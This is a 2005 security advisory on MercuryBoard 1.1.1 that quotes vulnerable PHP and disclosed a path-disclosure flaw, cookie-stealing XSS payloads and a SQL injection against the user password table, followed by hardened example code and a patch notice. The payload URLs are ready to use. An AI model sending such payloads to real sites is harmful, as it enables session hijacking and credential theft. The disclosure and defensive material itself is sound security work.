Multiple vulnerabilities in MercuryBoard 1.1.1

2005-01-25T00:00:00
ID SECURITYVULNS:DOC:7673
Type securityvulns
Reporter Securityvulns
Modified 2005-01-25T00:00:00

Description


  • CODEBUG Labs
  • Advisory #7
  • Title: Multiple vulnerabilities in MercuryBoard 1.1.1
  • Author: Alberto Trivero
  • English Version: Alberto Trivero
  • Product: MercuryBoard 1.1.1
  • Type: Multiple Vulnerabilities
  • Web: http://www.codebug.org/

--) Software Page (www.mercuryboard.com)

"MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services." Note that it is written in PHP using OOP.

--) Full Path Disclosure

Let's look at the original code from global.php, line 604:

    <?
    ...
    // some base variables
    // $num comes straight from the 'n' GET parameter and is never validated
    $current = ceil($min / $num);
    $string = null;
    $pages = ceil($rows / $num);
    $end = ($pages - 1) * $num;
    ...
    ?>

As we can see there is no check on $num, so if we simply assign the value 0 (or a non-numeric argument) to $num, a division by zero occurs and the resulting PHP error message reveals the full installation path:

http://www.sitewithmercuryboard.com/index.php?a=forum&f=2&min=0&n=0

Other Full Path Disclosure:

http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_bar.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_log.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_polar.php
http://www.sitewithmercuryboard.com/admincp/admin.php
http://www.sitewithmercuryboard.com/func/[file] <--- every PHP file in the directory: active.php, board.php, constants.php, cp.php, debug.php, email.php, forum.php, help.php, login.php, members.php, mod.php, pm.php, post.php, printer.php, profile.php, register.php, search.php, topic.php

--) Cross-Site Scripting (XSS)

Let's look at the original code from /func/pm.php, line 36:

    <?
    ...
    if (!isset($this->get['s'])) {
        $this->get['s'] = null;
    }
    // 's' is dispatched on, but its raw value is never validated or escaped
    switch ($this->get['s']) {
        case 'send':   return $this->send();      break;
        case 'view':   return $this->view();      break;
        case 'delete': return $this->delete_pm(); break;
        case 'clear':  return $this->clear();     break;
        default:       return $this->folder();    break;
    }
    ...
    ?>

As we can see there is a switch/case statement on 's', but there is no check on the value supplied for 's': anything that matches none of the cases falls through to the default branch unsanitized, so we can pass XSS code like this:

http://www.sitewithmercuryboard.com/index.php?a=pm&s='><script>alert(document.cookie)</script>

Let's look again at the original code, this time from /func/members.php, line 35:

    <?
    ...
    if (!isset($this->get['l'])) {
        $this->get['l'] = null;
    } else {
        // 'l' is only upper-cased, never validated or escaped
        $this->get['l'] = strtoupper($this->get['l']);
    }
    ...
    ?>

As we can see, also in this case there is no sanitization of 'l', so nothing prevents us from carrying out an XSS attack:

http://www.sitewithmercuryboard.com/index.php?a=members&l='><script>alert(document.cookie)</script>

Other Cross-Site Scripting:

http://www.sitewithmercuryboard.com/index.php?a='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=cp&s='><script>alert(document.cookie)</script>

--) SQL Injection

For the same reason that the XSS code described above can be executed (unvalidated parameters), SQL injection attacks are also possible. In this case, however, it is a non-critical bug, because a successful attack first requires being logged in as forum administrator. For example:

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

With the URL above we get, for the reason just described, an error like this (verified only on MercuryBoard 1.1.0):

The used SELECT statements have a different number of columns
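As an added example (my own code, not MercuryBoard's and not the 1.1.2 patch), here are hardened forms of the three patterns described above: the pagination divisor from global.php, the 's' action dispatch from func/pm.php, and the 't' topic id used in the SQL injection URL. The function names and the $get array are assumptions.

```php
<?php
// Added example, not MercuryBoard code: hardened forms of the three patterns
// the advisory describes. Function names and the $get array are assumptions.

// 1. Pagination (global.php pattern): validate the page size before dividing by it.
function page_bounds(array $get, int $rows, int $default_num = 20): array
{
    $opts = ['options' => ['min_range' => 1, 'max_range' => 200]];
    $num  = isset($get['n']) ? filter_var($get['n'], FILTER_VALIDATE_INT, $opts) : false;
    if ($num === false) {
        $num = $default_num;                 // n=0 or n=abc falls back to the default
    }
    $min     = isset($get['min']) ? max(0, (int) $get['min']) : 0;
    $pages   = max(1, (int) ceil($rows / $num));   // $num >= 1: no division by zero
    $current = (int) ceil($min / $num);
    $end     = ($pages - 1) * $num;
    return ['num' => $num, 'pages' => $pages, 'current' => $current, 'end' => $end];
}

// 2. Action dispatch (func/pm.php pattern): only whitelisted actions are accepted;
//    if a user-supplied value ever has to be echoed, it goes through html_escape().
function dispatch_pm(array $get): string
{
    $allowed = ['send', 'view', 'delete', 'clear'];
    $s = isset($get['s']) ? (string) $get['s'] : '';
    return in_array($s, $allowed, true) ? $s : 'folder';
}

function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3. Topic id (post&s=reply&t=... pattern): a non-integer id never reaches the query.
function topic_id(array $get): ?int
{
    $opts = ['options' => ['min_range' => 1]];
    $t = isset($get['t']) ? filter_var($get['t'], FILTER_VALIDATE_INT, $opts) : false;
    return $t === false ? null : $t;         // caller answers "no such topic" on null
}

// Constructed inputs mirroring the advisory's URLs.
print_r(page_bounds(['min' => '0', 'n' => '0'], 57));            // num 20, pages 3, no warning
echo dispatch_pm(['s' => "'><script>alert(1)</script>"]), "\n"; // folder
echo html_escape("'><script>alert(1)</script>"), "\n";          // &#039;&gt;&lt;script&gt;...
var_dump(topic_id(['t' => '0 UNION SELECT 1']));                // NULL
```

The path disclosure from directly requesting the jpgraph and func files is a separate issue of error output reaching the browser; setting display_errors=0 and log_errors=1 in php.ini keeps such warnings in the server log instead.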

--) Patch

After these bugs were reported to the developers of the board, they released MercuryBoard version 1.1.2, which corrects them: http://www.mercuryboard.com/index.php?a=downloads


    http://www.codebug.org